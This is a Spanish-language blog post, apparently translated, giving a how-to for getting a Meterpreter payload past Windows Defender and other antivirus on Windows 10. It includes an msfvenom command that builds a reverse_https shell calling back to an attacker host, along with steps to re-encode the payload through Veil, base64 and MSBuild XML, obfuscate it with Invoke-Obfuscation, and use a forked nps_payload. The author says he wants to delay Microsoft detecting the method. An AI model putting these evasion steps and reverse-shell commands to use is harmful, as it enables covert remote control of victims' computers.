‘Meterpreter’ en Windows 10 y hacer ‘Bypass’ a Antivirus – pt. 2

0
95

Si bien no he sido objeto de comentarios negativos, después de publicar mi publicación en el blog: Ejecutar Meterpreter en la Memoria en Windows 10 y Anular Antivirus, me he dado cuenta de que algunas de mis suposiciones iniciales son erróneas.

Esto es lo que he encontrado hasta ahora:

nps_payload será recogido por la mayoría de AV usando las opciones predeterminadas, ya que usa msfvenom en el backend para generar el código de powershell que se ejecuta.
Los archivos extraídos de WebDAV no son “sin disco”. Puede encontrarlos en C: \ Windows \ ServiceProfiles \ LocalService \ AppData \ Local \ Temp \ TfsStore \ Tfs_DAV.
Msbuild tampoco tiene memoria, cuando se ejecuta escribe varios archivos en C: \ Users \ [USER] \ AppData \ Local \ Temp \ [RANDOM] \. Sin embargo, limpia después de sí mismo, a diferencia de WebDAV.

La buena noticia de todo esto es que puedo solucionar el primer problema y proporcionaré los pasos para hacerlo.

Usando Velo:

Esto parte de la suposición de que ya tiene instalado Veil y de que ya creó un archivo msbuild_nps.xml usando nps_payload.

Ejecuta Veil usando las siguientes opciones:

 

Esto le dará un archivo payload.bat. Dependiendo de la Arquitectura del objetivo, copiaremos el comando relevante. A continuación, he resaltado la opción x64.



A partir de esto, quite las barras del \ “dentro de la carga útil (hay dos). Este escape es necesario al pegar en la línea de comandos de Windows, pero no lo necesitamos para lo que vamos a hacer.

Esto necesita ser codificado en base64 ahora. Una forma fácil es pegarlo en un archivo y ejecutar:

1
cat FILENAME.txt | base64 -w 0

 

Tome esa salida base64 y reemplace la cadena cmd dentro de su archivo msbuild_nps.xml. Asegúrese de no sobrescribir la comilla de cierre o el punto y coma.

 

De forma alternativa, puede ejecutar nps_payload nuevamente y suministrar su archivo.nombre de archivo como entrada usando la opción 4, carga útil de PS1 personalizada.

¡Aquí tienes! No más gruñón Windows Defender.

Usar invocación-ofuscación:

En primer lugar, vaya a Deshacer-ofuscación desplegable en un sistema que tenga PowerShell. Esto se ejecutará en uno de sus sistemas, no en el objetivo. Windows Defender puede enojarse contigo:

 

En mi caso, terminó dejándome funcionar de todos modos.

Para obtener su secuencia de comandos inicial de PowerShell, puede usar msfvenom de la misma manera que lo hace nps_payload:

1
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.137.134 LPORT=443 --

 

He alojado esto a través de HTTP con el módulo de servidor HTTP simple de Python. Esto nos ayudará a ponerlo en invocación-ofuscación.

Usando Invoke-Offuscation lo alimentaremos con nuestro script de PowerShell de la siguiente manera:

1
Invoke-Obfuscation> SET SCRIPTPATH http://192.168.137.134:8000/msf_payload.txt

 

Use cualquier método que quiera ofuscar, utilicé “TODO TODO”

1
Invoke-Obfuscation> TOKEN\ALL\1

 

Deberías obtener algo que se vea así:


Esta es su secuencia de comandos de PowerShell. Ahora puede ingresar esto en nps_payload como un archivo nuevo al invocar la opción 4, carga útil personalizada de PS1.

Usando la versión bifurcada de nps_payload de Franci Šacer:

Vaya y descargue su versión de https://github.com/fsacer/nps_payload.

Elija “Generar carga útil MSbuild / nps / msf CSharp”

 

Sigue los mismos pasos que antes. Esto no usa PowerShell en absoluto, lo que evita que se detecte de la misma manera que los otros métodos.

Honestamente, este es el mejor método de todos ellos en mi opinión, pero lo expreso al final porque quiero alargar el tiempo hasta que Microsoft comience a buscarlo también. 😉

 

Fuente: Sn00py

Dejar respuesta

Please enter your comment!
Please enter your name here